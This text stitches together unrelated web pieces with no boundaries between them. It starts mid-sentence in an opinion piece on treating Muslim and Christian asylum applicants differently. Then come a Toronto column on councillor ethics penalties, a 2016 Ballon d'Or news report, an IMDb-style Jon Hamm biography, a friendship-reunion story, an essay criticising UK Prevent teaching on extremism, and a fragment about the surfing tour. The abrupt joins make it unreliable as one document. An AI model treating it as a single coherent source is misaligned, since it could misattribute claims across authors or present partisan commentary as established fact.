jihad and sexual slavery ) . To the contrary , the Islamic State seeks to rule Muslims , not kill or persecute them . … And it is downright dishonest to claim that taking such religious distinctions into account is “ not American , ” let alone “ shameful. ” How can something American law requires be “ not American ” ?
There are strong practicals as well as legal reasons for distinguishing between Islamic applicants for asylum and similar applications by Christians or others . We know that ISIS is trying to infiltrate terrorists into groups of migrants leaving Syria ; there is some evidence that they have succeeded . As McCarthy says , no one has a right to emigrate to the U.S . The government 's first duty is to protect the American people , not to extend favors to foreigners . Moreover , Obama 's “ compassion ” argument falls flat . A recent Center for Immigration Studies report found that , for the cost of resettling one refugee in the United States , we could instead care for 12 refugees overseas . That is a much more cost-effective approach , and one that will not impose needless dislocation either on us , or on the refugees .
JOE adds : I have to say that by far the most disconcerting thing about Barack Obama as a man is–and this is a matter of objective observation , not of interpretation–that the only thing that really gets him emotionally fired up is his own conservative countrymen . The South China Sea , Ukraine , Russia , Syria , Iran , North Korea–nothing seems to faze this guy quite like Americans who read Burke .
According to media reports from last week 's marathon council session , Toronto politicians slapped Giorgio Mammoliti with the toughest possible penalty for breaching the City 's Code of Conduct — a three-month salary suspension ( worth $ 26,000 ) over the matter of the $ 500-a-ticket fundraiser held last spring to help the shirtless wonder defray his legal bills .
As the National Post 's headline stated , “ Councillor Giorgio Mammoliti has pay docked for three months over $ 80,000 in gifts from lobbyists. ” The vote was 37-2 .
But given that integrity commissioner Janet Leiper could n't legally compel Mammoliti to refund all those unctuous contributions from his self-interested supporters , it seems to me he actually came out ahead , to the tune of $ 54,000 — provided he 's not so stupid as to set fire to that sizeable windfall by pursuing a lawsuit challenging her recommendation and council 's decision .
Message : crime pays !
Okay , okay . Let 's not use the word “ crime. ” Let 's say : unethical , integrity-free behaviour pays ! — just as it did in the bad old days of the MFP scandal , when a handful of lobbyists and city officials linked to a corrupt computer leasing deal succeeded in pocketing all sorts of green . ( The police never laid charges . )
During the very same meeting , the penultimate one of this insane term , council spent hours tying itself up in rhetorical knots over Leiper 's recommendation that Mayor Rob Ford apologize in writing [ PDF ] for robo-calling Paul Ainslie 's constituents after the Scarborough councilor voted to support a Scarborough LRT instead of a subway .
The debate was a kind of reprise . As it happens , the final session of David Miller 's second term in office , held in late August , 2010 , featured a heated debate about an alleged code of conduct violation by then Ward 2 councillor Ford , who , it transpired , had hit up numerous lobbyists and companies doing business with the city for donations to his football foundation .
Four years ago , Leiper urged council to vote to ask Ford to return the donations ( he refused , and the rest is history ) . Last week , she merely asked council to instruct him to play nicely with the other children in the playground . After much genuflecting about whether such gestures matter in the political arena , Ford shuffled onto the floor of council , had a short whispered exchange with the city solicitor , and muttered an apology that struck me as both content and contrition-free . Still , Ainslie accepted it , and we moved on .
The juxtaposition of these two cases is yet another reminder that the City of Toronto 's integrity commissioner system , as laid out by the City of Toronto Act ( COTA ) , is both far more and much less than it should be .
Less , because there 's no way Mammoliti should have gotten off as easily as he did with that fundraiser . And more , because the commissioner 's de facto role as a referee overseeing council 's political etiquette increasingly strikes me as redundant .
When the province passed COTA in 2006 , several of its key provisions flowed directly from the MFP scandal and the ensuing inquiry by Justice Denise Bellamy . It established four accountability officers ( integrity commissioner , lobbyist registrar , auditor-general , ombud ) and provided each with legislative powers intended to prevent the sort of corruption – lobbyists collecting political donations , bureaucrats going on corporate junkets , etc . — that festered inside City Hall after amalgamation .
The Code of Conduct emerged as the vehicle for encouraging , if not ensuring , reputable , conscientious behaviour . At a more granular level , the Code 's provisions can be separated into two broad categories – one set of rules governing political conduct ( e.g. , failing to adhere to council policies ) ; and another , more specific , set of provisions that regulate the way politicians interact with lobbyists , suppliers and others seeking to do business with the city . This latter set of provisions focuses on things like gifts , improper use of influence , and interactions with lobbyists .
For years , we 've watched as the integrity commissioner 's office has been used as a vehicle for trying to police the way the Fords transact politics . In theory , the commissioner 's legislated authority should serve as a way of delineating what 's acceptable and what should be subjected to public shaming . In practice , however , the system has failed a crucial stress test , and that , to my mind , raises questions about whether council should even be in the business of regulating how its members play the game of politics .
Does it matter that a man who is nearly incapable of telling the truth mumbles an apology to another councillor ? Has that gesture restored the world 's equilibrium ? Is our democracy healthier this week than it was last ? Will Ford now turn his back on the practice of using privately-funded robocalls against targeted opponents ? No , no , no and , I strongly suspect , no .
On the other hand , we should all be deeply troubled that COTA does n't allow council to go much further in prosecuting politicians who abuse their positions in order to benefit themselves , their friends , or their cronies . Just consider two cases reported by The Globe and Mail showing how the Fords tried to push city officials to deliver financial benefits ( tax incentives in the case of Apollo , and an outsourcing deal in the case of R.R . Donnelley ) to companies with which Deco Labels has business relationships .
It 's important to note here that when Leiper recommended that Ford repay the football foundation donations as a penalty for breaching the Code , she got her wrists slapped by a provincial court judge who ruled , during the 2012 conflict of interest case against Ford , that she 'd gone beyond her statutory limits when she made that recommendation ( something no one , including the city solicitor , noticed at the time ) . The law , the court said , was clear : the maximum penalty council can impose on one of its members for violating the Code is three months of salary .
The problem , as this recent Mammoliti case shows , is that you can violate the Code and still come out ahead . It 's true that most politicians are n't as shameless as he is , so I 'm not expecting that Mammoliti 's tactics will become the norm . Still , the bottom line — $ 54,000 in the black — suggests the disincentive is inadequate .
Even more important is what this relatively modest fine implicitly says about those critical provisions in the Code that seek to prevent politicians from abusing the public 's trust and misusing their own positions of influence . After all , what 's at stake here is nothing less than the city 's credibility and council 's reputation for probity . Surely , such institutional virtues are worth more than $ 26,000 .
by Erik Parker
Real Madrid 's Cristiano Ronaldo won the Ballon d'Or for a fourth time on Monday night , beating Barcelona 's Lionel Messi and Atletico Madrid 's Antoine Griezmann to world football 's top individual prize for 2016 .
Ronaldo , who previously won the award in 2008 as well as in 2013 and 2014 , when it was officially the FIFA Ballon d'Or , is only the second player to win it a total of four times , trailing only Messi 's record of five .
The honour caps a memorable year that saw Ronaldo win the Champions League with Real Madrid and the European Championship with Portugal -- the country 's first major footballing silverware .
`` It is a special moment . It means that all my sacrifice was worth it . I feel very happy to win this . I worked very hard , '' Ronaldo said in accepting the award .
`` A lot of people helped me get here , and it is not easy to get here . You can count on one hand players who maintain this level year after year . I am one of them , and that is a source of pride for me . ''
Real Madrid are preparing to take on Club America in the semifinals of the Club World Cup in Japan .
Ballon d'or France Football 2016 winner : CRISTIANO RONALDO # ballondor pic.twitter.com/ECa0u3L6EK - France Football ( @ francefootball ) December 12 , 2016
Ronaldo , 31 , has scored 51 goals in 54 games for club and country in 2016 . The 13 goals he scored for Portugal are a career high for him in a calendar year .
His 31 goals in La Liga trail only Barcelona 's Luis Suarez for the most in Europe 's top five leagues .
Messi , 29 , was the runner-up for the fourth time in his career after also winning the award in 2009 , 2010 , 2011 , 2012 and 2015 . He won La Liga and the Copa del Rey with Barcelona and helped Argentina to the Copa America Centenario final in 2016 .
Griezmann , 25 , finished third after winning the Golden Boot at Euro 2016 , a tournament in which he helped France reach the final . He also played an important role for Atletico as they reached the Champions League final , which they lost on penalties to Real .
Cristiano Ronaldo captained Portugal to victory at Euro 2016 this summer .
Only Ronaldo and Messi have won the Ballon d'Or since 2007 , when Kaka won the prize .
Ronaldo 's fourth award brings Real Madrid 's tally to nine , breaking a tie with AC Milan and Juventus for second most behind Barcelona 's 11 . Portugal moved into a tie for the third-most-awarded country , level with France on six -- one behind leaders Germany and Netherlands .
Earlier this year , magazine France Football , which has organised the Ballon d'Or award since 1956 , ended a six-year relationship with FIFA in which they combined with the world football governing body 's World Player of the Year award .
After the split , FIFA announced the introduction of its own Best FIFA Men 's Player award -- with the same three finalists -- to be announced at a ceremony in Zurich on Jan. 9 .
The complete 2016 Ballon d'Or placements , as announced by France Football :
1 . Cristiano Ronaldo ( Real Madrid , Portugal )
2 . Lionel Messi ( Barcelona , Argentina )
3 . Antoine Griezmann ( Atletico Madrid , France )
4 . Luis Suarez ( Barcelona , Uruguay )
5 . Neymar ( Barcelona , Brazil )
6 . Gareth Bale ( Real Madrid , Wales )
7 . Riyad Mahrez ( Leicester City , Algeria )
8 . Jamie Vardy ( Leicester City , England )
9-t. Pepe ( Real Madrid , Portugal )
9-t. Gianluigi Buffon ( Juventus , Italy )
11 . Pierre-Emerick Aubameyang ( Borussia Dortmund , Gabon )
12 . Rui Patricio ( Sporting , Portugal )
13 . Zlatan Ibrahimovic ( Paris Saint-Germain/Manchester United , Sweden )
14-t. Arturo Vidal ( Bayern Munich , Chile )
14-t. Paul Pogba ( Juventus/Manchester United , France )
16 . Robert Lewandowski ( Bayern Munich , Poland )
17-t. Dimitri Payet ( West Ham , France )
17-t. Luka Modric ( Real Madrid , Croatia )
17-t. Toni Kroos ( Real Madrid , Germany )
Eleven other players on the original shortlist were not ranked : Sergio Aguero ( Manchester City ) , Kevin De Bruyne ( Manchester City ) , Paulo Dybala ( Juventus ) , Diego Godin ( Atletico Madrid ) , Gonzalo Higuain ( Napoli/Juventus ) , Andres Iniesta ( Barcelona ) , Koke ( Atletico Madrid ) , Hugo Lloris ( Tottenham ) , Thomas Muller ( Bayern Munich ) , Manuel Neuer ( Bayern Munich ) , Sergio Ramos ( Real Madrid )
Follow @ ESPNFC on Twitter to keep up with the latest football updates .
Overview ( 3 )
Mini Bio ( 1 )
Jon Hamm was born on March 10 , 1971 in St. Louis , Missouri , USA as Jonathan Daniel Hamm . He is an actor and producer , known for Mad Men ( 2007 ) , The Town ( 2010 ) and A Million Dollar Arm ( 2014 ) .
trademark ( 4 )
Dark hair
Magnetic green eyes
Deep stern voice
Usually plays intelligent , easy-going , and handsome characters
Trivia ( 33 )
Became interested in acting in the first grade , when he was handpicked to play Winnie-the-Pooh . Received a scholarship to study acting at the University of Missouri .
Worked as a day-care teacher during college and , before moving to Hollywood , was a high school teacher .
Is an avid golfer , as well as a big football fan .
His mother died when he was ten , and his father ten years later .
Went to high school ( John Burroughs High School in St. Louis ) with Sarah Clarke
Taught drama at his alma mater , John Burroughs High School in St. Louis , Missouri . One of his students was Ellie Kemper
Very close friends with Paul Rudd
Has two step-siblings .
Is an avid St. Louis Blues ice hockey fan .
Is an avid St. Louis Cardinals baseball fan and narrated the 2011 Official World Series film .
He is a big fan of The Simpsons ( 1989 ) .
Went to a prom with Sarah Clarke , who also later became a professional actor ( 24 ( 2001 ) ; the `` Twilight '' series ) .
Is a huge Comic book fan .
He is of German , English , and Irish ancestry .
Is a huge comedy fan and is known to frequently quote lines from `` Anchorman : The Legend of Ron Burgundy ( 2004 ) '' and comedy troupe `` The Kids in The Hall '' .
He is a big St Louis Cardinals fan , providing the narration for the Cardinals ' 2011 World Series championship film .
Struggled with severe chronic depression in his early twenties after the death of his father .
Did not book a single acting job in the first three years of his career in Los Angeles .
Once worked as a set dresser for pornographic films .
Was unable to find work in his mid twenties as most roles were for High school aged characters and he looked too old .
Gave himself a career deadline , saying that he planned to move back home if his acting career did not gain momentum by the age of 30 .
Was represented by the famous William Morris Talent agency , but was dropped after failing to book a single part in three years .
( Late March 2015 ) Completed a 30-day stint in rehab to treat his alcohol addiction . He previously admitted turning to alcohol to cope with his father 's death in 1991 , which made him also seek therapy .
Owns a home in the Upper West side of New York City .
Became a fan of Cricket after being introduced by Daniel Radcliffe while making `` A Young Doctor 's notebook '' .
Although his character Don Draper is famous for being a very heavy smoker , Hamm quit smoking when he was twenty-four and uses herbal cigarettes on `` Mad Men '' .
Is a member of the Democratic party .
Adopted his dog Cora , a mutt , from a shelter in 2003 .
Starred in a video on the Shelter Me website to encourage dog adoption .
Attended Prince 's very last concert , a 90-minute non-stop extravaganza at the Fox Theater in Atlanta , Georgia ( April 2016 ) .
Personal Quotes ( 23 )
Being in an ensemble cast is the best . You 're all in the same boat . You 're all together . [ on being part of The Division ( 2001 ) cast ]
I have a lady , she 's a great lady . I love her a lot , she loves me . We 're on the same page . Whenever that day happens when we 're not on the same page we 'll move forward with it . We 're interested in having our lives be our lives right now and not a third person 's vis-à-vis marriage and whatever that means . - on his relationship with long-time girlfriend Jennifer Westfeldt
[ on his advice to aspiring actors ] I guess I would say , `` Do n't be afraid to fail . '' It 's not the end of the world , and in many ways , it 's the first step toward learning something and getting better at it . If you live your entire life never having failed at anything , it 's got to be a weirdly false existence in so many ways . So I think that-depending upon the age , obviously-that would be my bit of advice . Just do n't be afraid to fail .
[ on teaching acting ] I went back to my old high school after I graduated from college . I did n't have any money . Literally , no money . So I had to find a job , and I started waiting tables a little bit , and I had the idea that I would go back and talk to my old high-school acting teacher . I said , `` Hey , man , what do you think of this idea ? Would it be helpful if I came back , and taught all the classes you do n't want to teach , or that you 're too busy to teach ? And helped you out ? I 'm cheap . '' And he said , `` That 's a great idea . I 'd love the help . '' And so we together pitched it to the headmaster , and he was like , `` Sounds great . It 's too late to start this year , why do n't you start next year ? '' So I took a year , I waited tables , and then I taught school for a year , and after that I was 25 , I think , and I was ready to try to go . I had a little bit of money saved , and my car sort of ran , so I was like , `` You know what , I 'm gon na try it before I get any older and I lose any momentum I have . '' And west I came .
I went to a high school where you were encouraged to do a lot of different things , so there was n't this great divide between the jocks and the theater guys , or the smart kids and the stoners , or whatever . It was like everybody was a little bit of everything , and that was encouraged . I was a pretty serious athlete for a long time , and thought maybe that 's what I wanted to do with my life , but I was also a diligent student , and really wanted to achieve in that area , too . And theater was kind of a challenge , like , `` Oh , maybe I could do that , that looks like fun . '' So I started doing it a little bit in 11th and 12th grade , and got pretty good feedback , and kept getting cast to do bigger and bigger parts . And I started to think , `` Oh , maybe this is something I could do . '' But I went to college and kind of forgot about it until I was a junior , and I randomly answered an ad in the paper for some production of Midsummer Night 's Dream that was coming through . They were casting students as the young lovers , and having an open audition . I remember looking at my roommate and going , `` You know what , fuck it , I 'm gon na audition for this thing . What 's the worst that could happen ? '' And I did , and I got it . And then the theater department was like , `` You should be in the theater department , why are you not ? You 're good at this . '' Enough people kept saying , `` You know what ? You 're kind of good at this . Why are n't you doing it for real ? '' that finally I started listening , and over the next couple of years at school , I ended up getting a theater scholarship , and doing close to 15 plays over two years , and really focusing on it . But at every level , you 're constantly reminded that there are other people that do it better than you and have been doing it longer than you . It was a real wakeup call coming to L.A. , where it 's , `` Well , you 're not the go-to guy that you were in the University Of Missouri theater department . Now there 's 100,000 people ahead of you in line . '' But for whatever reason , it did n't faze me . I just kept plugging away , and putting one foot in front of the other , and showing up .
( On landing his role in Mad Men ( 2007 ) ) It was amazing . I read the script , and it was for AMC , and I thought , `` They 've never done anything that 's remotely like a TV show , so what 's that going to be like ? '' I read the script for Mad Men ( 2007 ) and I loved it . Then , I realized that a guy who wrote for The Sopranos ( 1999 ) , Matt Weiner , created it , so I thought , `` Okay , that 's pretty cool '' . But I never thought they 'd cast me-I mean , I thought they 'd go with one of the five guys who look like me but are movie stars . Obviously , they did n't . I literally had to go through six or seven auditions . They flew me to New York to meet all the people at AMC . My final audition was at that bar on the roof of the Hotel Gansevoort . When we were riding down on the elevator , the woman in charge of whatever the decision-making process was told me , `` You got the job '' .
( 2010 ) I certainly go after what I want . But I just have detached amusement about a lot of it . Because it 's silly . This job is ridiculous . There 's a line from 30 Rock ( 2006 ) that Tracy Morgan says that makes me laugh out loud : `` I remember that movie-I got paid one million teacher salaries '' . It is what it is .
( On landing Mad Men ( 2007 ) ) `` If this show had been on any of the major network . I never would have been cast , ever , period , done , never , no way . They would want someone like Rob Lowe who 's got a proven track record . I would 've gotten all the way to the end . . . and then I would n't get cast .
( On acting in high school ) I never minded standing up and looking like an idiot , which is tremendously helpful in this industry and not so much in others .
L.A. represents opportunity . And , as has been proven over and over in the current media landscape , it does n't take much for them to put you on TV . If that 's all you want , you can be on The Bachelor or The Real Housewives or whatever show just wants oversized personalities , ridiculous behavior , and zero dignity .
... When you try to learn how to act , you approach it with respect . But if you just want to be famous . . . that 's not that much different than porn . ' I 'm a movie star ! ' Well , no , you 're not . You 're a porn star , and that 's completely different . And you know , hey , mazel tov-porn probably built half the houses out here , but you 're selling your dignity in a way that I feel I 'm not . And once you sell it , it 's gone . You ai n't getting it back .
[ 2010 ] It 's nice not to have to worry about how you 're going to pay your bills . And it 's a problem I 've had for far longer than I have n't had it . Not worrying about the bills is still very new for me .
[ 2010 , on early big-time auditions that lead nowhere ] I had met Steven Spielberg and all these people that had my eyes just rolling back in my head . The opportunities I almost had ! And there 's this hideous thing they make you do when you go up for a television show : they make you sign a contract before you walk into the final audition . The last thing they want is for you to have everyone fall in love with you , and then you not have a deal in place . So you sign this thing - and I had no money ; I was broke . You 're staring at the five-figure pay check you 'll get ... if ... If ! A crazy amount of money for someone who has none . So I was thinking : I 'll pay my loans off and do this and that and maybe get my car fixed ... and , by that time , they 're calling you in , you 're like : `` Shit ! I have to do the scene ! What the fuck are the lines ? '' I would get hung up on that stuff and be an utter failure in the room .
I played Winnie the Pooh in first grade . I was an early adopter of standing in front of people and looking like an idiot .
I 'm 40 , which is ridiculously old in Hollywood . I mean , come on , I 'm not in Twilight ( 2008 ) . I could play their grandfather or something .
We 're at a place where the idea of being 'elite ' is somehow considered a negative . Whether it 's Paris Hilton or Kim Kardashian West or whoever , stupidity is certainly celebrated . Being a fucking idiot is a valuable commodity in this culture because you 're rewarded significantly . Incuriousness has become cool ... It 's celebrated . It does n't make sense to me .
[ more on reality TV/celebrity culture rewarding stupidity ] It 's a part of our culture that I certainly do n't identify with and I do n't really understand the appeal of it other than that car-crash sensibility . It 's not something that I partake in or enjoy , but it is what it is and here we are .
[ on Mad Men ( 2007 ) ] I think , in many ways that [ happiness is ] one of the larger themes of the show .. and what it takes to achieve that . The central irony is that this is a man who ostensibly works at selling happiness and , yet , he is pretty dissatisfied with his own lot in life .
The first time I met Bryan Cranston , he was standing in his underwear . We were doing a photo shoot for a little-known network called AMC , and he was in a rubber chemistry apron , tighty whities and desert boots , while I was in an impeccably tailored 1960s suit , a cigarette dangling from my mouth . Our shows had n't premiered yet . We were simply two actors , in costume and out of context . He was friendly , funny , gregarious , humble and lovely . Over the past five seasons , I 've marveled at Bryan 's ability to turn 'Breaking Bad 's Walter White from a feckless , terrified father and husband into a ruthless , terrifying father , husband and crime lord . The transformation is mesmerizing . The performance is fearless . Bryan is that good .
I 'm always surprised when people are like , ' I want to be just like Don Draper ' . You want to be a miserable drunk ? The outside looks great , the inside is rotten .
[ on playing Don Draper in 'Mad Men ' ] This is the best job I 've ever had and maybe will have in my life . It 's so fun to play all of this . It can be relentlessly dark . I can be terribly sexually inappropriate is a way to say it . But who else gets a chance to do that kind of stuff ? There 's so much there .
Whenever people want to talk about how hard it is to be an actor , I want to go , 'Um , it 's hard to be a baby heart-surgeon ' . Being an actor is actually pretty easy , if you can memorize lines .
I quit smoking when I was 24 . It 's glamorous on film , but it 's not glamorous waking up and smelling like an ashtray .
Salary ( 1 )
- In 1975 two junior high schoolers befriended each other during a race riot and were recently reunited after 38 years !
Deitrice `` Dee Dee '' Willard-Ruffi and Jane Brosnahan Luke met during a race riot in the halls of Glasgow Junior High School .
`` I ran into a Caucasian girl who asked me to walk her to class because we were in the middle of a race riot at our school and she was afraid . I did it so she could stay safe and from that we became good friends . '' Deitrice told FOX 5 .
Jane went on to introduce Dee Dee to her parents and their friendship blossomed ! But when they graduated from J.E.B Stuart High School , now named Justice High School , in 1980 , the pair went their separate ways and never saw or heard from each other again .
Dee Dee told FOX 5 she never forgot about Jane and her memory lived on in her heart .
And Jane probably felt the same way too because through the power of social media , she found Dee Dee on Facebook and reconnected with her !
The pair reunited after 38 years with each other 's grandchildren and with Jane 's mother and family .
`` I believe you judge people by the content of their character NOT by the color of their skin , '' Dee Dee told FOX 5 .
Their story is the true definition of love knows no color !
Dee Dee says they plan on seeing each other more often and will NEVER separate again .
Given the recent attacks in London and Manchester , the violence of the far right in murdering the MP Jo Cox , and the images of the London bombings in 2005 still fresh in Britain 's collective memory , it is no surprise that preventing terrorism remains a high priority for the UK government . Yet , since 2005 , preventing terrorism has shifted , from attempting to stop terrorist attacks , to attempting to pre-empt terrorism by discouraging the ideas that appear to be behind these attacks . Since 2005 , the fear of ‘ home-grown terrorism ' has led to a policy focus on ‘ extremism ' – defined as a precursor stage on a ‘ radicalisation ' journey towards political violence . Yet , what does ‘ extremism ' mean ? And what ideas are therefore considered threatening ?
A certain logic appears to dictate how we comprehend an attack having taken place . The perpetrator of the violence is a ‘ terrorist ' who must have been ‘ radicalised ' to believe that violence is a legitimate action to achieve a political goal . Furthermore , this radicalisation must have been promoted by an ‘ extreme ' political ideology that catalysed that journey . Whether we look at Mohammed Emwazi ( the British ISIS fighter known more commonly as ‘ Jihadi John ' ) , or Thomas Mair ( Jo Cox 's murderer ) , newspapers are awash with analyses of the ‘ radicalisation journey ' , which attempt to pinpoint the very moment , and the very factors , that caused that person to take up a violent struggle .
Yet , this fascination with journeys to terrorism , and this emphasis on ideology , is not supported by academic research . The fact of the matter is that the empirical evidence is very weak and uncertain . We simply do not have the ability to say why one person turns to violence , while another , under the very same conditions , does not . Despite this focus on ‘ extremism ' and ‘ extremist ideology ' , we are no closer to saying what impact it has on political violence . In the words of terrorism scholar , Mark Sageman , “ There is no doubt that ideology , including global neo-jihadi ideology , is an important part of any explanation in the turn to political violence , but we still do n't know how ” . The American scholar Randy Borum is even more dismissive of theories of radicalisation : “ None of them yet have a very firm social-scientific basis as an established ‘ cause ' of terrorism , and few of them have been subjected to any rigorous scientific systematic enquiry ” .
This uncertainty in the ‘ science ' behind radicalisation does not appear to have translated into policy circles .
This uncertainty in the ‘ science ' behind radicalisation does not appear to have translated into policy circles . In the 2011 major overhaul of the UK 's counter-terrorism Prevent strategy , the emphasis on the ‘ ideology ' of terrorist groups was made objective number one . The strategy writes that Prevent will , “ respond to the ideological challenge of terrorism and the threat we face from those who promote it ” . It is this transformation of counter-terrorism strategy into a counter-ideological project that makes the UK 's approach to countering terrorism so threatening to democracy and political change more broadly .
Prevent explicitly aims to counter extremist ideology . One arena in which it aims to achieve this is in schools . Since 2015 , schools must by law , comply with the ‘ Prevent duty ' – a legal requirement that teachers are trained to identify to relevant authorities any students that might display signs of ‘ radicalisation ' . Such a requirement has had profound and traumatic impact on some students , the vast majority of whom are Muslim . A report by the Open Society Justice Initiative entitled Eroding Trust listed a number of troubling cases including : primary school students having their political opinions recorded by the Home Office ; a 12-year-old being interviewed by school leaders after playing a ‘ terrorist ' in a drama class , and a secondary school-aged student being interviewed by police for expressing pro-Palestinian views in school . All of the students involved were Muslim .
But schools must not just scrutinise and survey their students . They are also regulated on their ability to promote “ fundamental British values ” and their ability to “ challenge extremist views ” . This curious expression of ‘ fundamental British values ' was conceived within the first attempt by a UK government to define extremism – within the 2011 overhaul of the Prevention strategy :
“ Extremism is vocal or active opposition to fundamental British values , including democracy , the rule of law , individual liberty and mutual respect and tolerance of different faiths and beliefs . We also include in our definition of extremism calls for the death of members of our armed forces , whether in this country or overseas . ”
Despite clear divergence and contestation in the academic literature regarding the meaning of extremism , the UK government defines an extremist as someone opposed to a certain group of values . These values have been critiqued for not being uniquely British , for being vaguely grouped under the word ‘ including ' , and for being potentially contradictory – the Suffragettes ' necessity to break the law in order to make Britain more democratic being oft-cited in this regard . Despite this , schools make frequent reference to this definition , with common citations in school counter-extremism policies , school assemblies on fundamental British values , and in classes that teach students about terrorism and extremism .
But how do schools interpret ‘ extremism ' and how do they challenge extremist narratives ? Exploring this aids an understanding of the broader implications of this focus on ‘ extremism ' in countering terrorism . This article reports findings from an on-going study , which has analysed nearly 200 lessons currently used in British classrooms that teach students about the issues of extremism and fundamental British values . Exploring schools ' teaching on the topic offers us all great pause for thought as to the dangers of current thinking about extremism and counter-extremism , and in particular its threat to democracy .
The study analysed how extremism was defined in each of these 200 lessons . It found three broad groups of definitions . Some lessons offered no definition at all – assuming students would already know what extremism is . Others would offer tautological definitions suggesting ‘ extremists are people with extreme political or religious views ' . The third group would cite the government 's definition straight from the Prevention strategy directly into classroom presentations .
It is heavily implied that the UK government holds British values , and that anyone who does not is therefore an extremist .
Students are thus being offered very little assistance in assessing what might be considered ‘ extreme ' , but they are certainly being aided in understanding what the ‘ moderate ' or the ‘ reasonable ' is . Through citing the government 's definition , students are being taught that the UK government is the barometer from which extremism is measured . It is heavily implied that the UK government also holds British values , and that anyone who does not is therefore an extremist . The government is thereby in a position to adjudicate the ‘ normal ' or the ‘ reasonable ' . One sees this most clearly when the fundamental British values themselves are being taught . Democracy , for instance , is often taught in direct contrast to dictatorship . One presentation explains , “ The UK is a democracy , of course ” . Another compares the pros and cons of living in the UK or living in IS-controlled Syria , and asks students where they would prefer to live . That the UK could be more democratic is a suggestion that is very rarely offered .
In cases where definitions of extremism are absent or tautological , students are asked to fill in the gaps . But this does not stop these resources building up a picture of the ‘ normal ' from which extremism is said to deviate . Extremists are painted as being ‘ manipulated ' , and ‘ vulnerable ' to being ‘ brainwashed ' . As such , rational , moderate , correct views and values are implied into existence . Extremists are painted as abnormal . As one classroom presentation to students explained : “ Extremism in its broadest sense is an individual or group of individuals who take an extreme position from that of the norm , or take an extreme action ” .
Extremists are thus painted as people who have “ crossed a line ” from the permissible to the illegitimate . In an educational video , one interviewee explains : “ Extremism for me is when somebody goes too far because of something that they believe in ” . Exploring the multitude of examples of ‘ extremism ' that are given across these lessons helps to explain both a lack of clarity as to what extremism is , and the sheer breadth of ideas that are seen to have crossed this line into extremism .
Alongside the many mentions of what might be termed ‘ Islamic extremism ' and the frequent mentions of what might be termed ‘ right wing extremism ' , it is fascinating to examine the more unusual examples of extremism on show in these materials . In particular , these examples tend to focus on having crossed one of two ‘ lines ' – into the realm of illegality or into the realm of violence .
Caroline Lucas MP 's arrest at an anti-fracking demonstration was given as an example of extremism .
With regard to the latter , it is interesting how often examples of genocide – the Holocaust and the Rwandan genocide in particular – are given as examples of extremism . While these are both certainly forms of ‘ extreme ' violence , they appear to bear little relation to contemporary threats , and are particularly at a distance from current terror threats from those inspired by white supremacists or the Islamic State . The violence of genocide is horrific , but is it terrorism ? In another case of ‘ extreme ' violence , students examine violent clashes that occurred between members of the EDL and anti-fascist protesters , and are asked , “ when does protest cross the line ? ” – with the occurrence of violence demonstrating the presence of extremism .
In other cases , it is breaking the law that indicates ‘ extremism ' – the rule of law being one of the ‘ fundamental British values ' . One respondent in an educational video , when asked ‘ what is extremism ? ' answers : “ Anything that does n't obey the law of the land is extreme ” . Examples included students protesting tuition fees in 2011 damaging property , or an educational play in which a fictional ‘ anti-capitalist ' group had planned to break into and graffiti a bank . It seems of little surprise , therefore , that Caroline Lucas MP 's arrest at an anti-fracking demonstration was given as an example of extremism by a police officer training teachers in the Prevent duty . It appears that civil disobedience , despite it playing a vital role in struggles for women 's suffrage or employment rights , both contradicts ‘ fundamental British values ' and is ‘ extreme ' .
What is perhaps of most concern are examples of 'extremism ' where it is merely an opinion or view , rather than an action .
What is perhaps of most concern however , are examples of 'extremism ' where it is merely an opinion or view , rather than an action , that has strayed across a ‘ line ' too far from the norm . The Westboro Baptist Church ( organisers of the “ God Hates Fags ” protests ) is given as an example . One presentation offered a series of examples of ‘ extreme ' views that students were required to challenge including “ Multiculturalism is bad for Britain ” – an argument made strongly in a speech by David Cameron back in 2011 – yet , one would be hard-pressed to argue the then Prime Minister was an extremist . One can be ‘ extreme ' about a whole host of issues according to some teaching materials – rights for fathers , nuclear power , whale hunting , even vegetarianism . 'Extreme ' appears synonymous with being passionate for unpopular ideas – and yet , these ideas are also being painted as threatening .
While these examples of extremism appear broad , and at times laughable , what is of most concern is the links drawn between these ‘ extreme ' views and the potential for political violence . Despite , as mentioned above , the lack of scientific support that can link so-called ‘ extremist ideology ' to the use of political violence with any certainty , the linkages between ideas and violence is made very clear in educational resources . As one teaching resource explains : “ Extremism can lead to violence and so it is never OK because we ca n't predict what will become of extreme views and innocent people do n't deserve to suffer. ” As the UK government themselves argue in the Prevention strategy : “ Terrorist groups of all kinds very often draw upon ideologies which have been developed , disseminated and popularised by extremist organisations that appear to be non-violent ” . Extreme ideas in non-violent organisations may lead to violence , and thus need to be discouraged : the threat to democracy appears considerable .
As someone who has engaged in civil disobedience and been threatened with arrest , I have “ crossed the line ” into extremism .
In compiling this research , it appears that , according to the UK government , I am an extremist . As someone who has engaged in civil disobedience and been threatened with arrest , I have “ crossed the line ” into extremism . But moreover , even if I had not done this , and did not ever plan to do so in the future , simply acknowledging the legitimacy of civil disobedience might be enough to be considered an extremist if , after hearing my views , someone else went to protest illegally . In linking the term ‘ extreme ' both to the threat of violence and to the idea of ‘ abnormal views ' , the UK government is transforming diverse ideas into a threat , and narrowing the window of legitimate opinion . In countering extremism , the UK government is therefore countering a key tenet of democracy – free and open debate of a diversity of views and ideas . It is deeply ironic that in attempting to protect so-called fundamental British values , the UK government appears to endanger those very same values it champions . It is deeply troubling that the window of ‘ reasonable ' and ‘ permissable ' political views that we are offering to our young people in their education on extremism and terrorism is so narrow .
It is clear a new strategy is needed if the UK wishes to both counter extremism and promote democracy . Perhaps clearly discouraging the use of violence rather than discouraging diverse political views would be a good first step forward .
It 's all happening at Snapper Rocks right now , folks !
And it seems like there 's more money than ever : The Quik Pro , like all the men 's WCTs in 2014 , has a prize boost to half a million dollars , while the accompanying Roxy Pro jumps to $ 250,000 .
Like we said , it 's all happening . But what is `` it '' ? How far along is ZoSea Media in its effort to re-invent the pro surfing wheel ?
Trying to get a picture of this can be difficult . Aside from its recent PR blitz , the new ASP can feel amazingly opaque . Emails and phone calls go unanswered , and in the space left , uncertainty and gossip can arise . Jeez , check out Facebook .
But a big part of it is that the ASP staff has been close to overwhelmed . Re-invention has turned every detail of the world tour 's operation into a massive reconstruction exercise . One of Tour Commissioner Kieren Perrow 's first agenda items , for instance , was a re-jig of the hoary old ASP Rule Book . He assembled a small team , including Renato Hickel and Al Hunt , and began combing through the document .
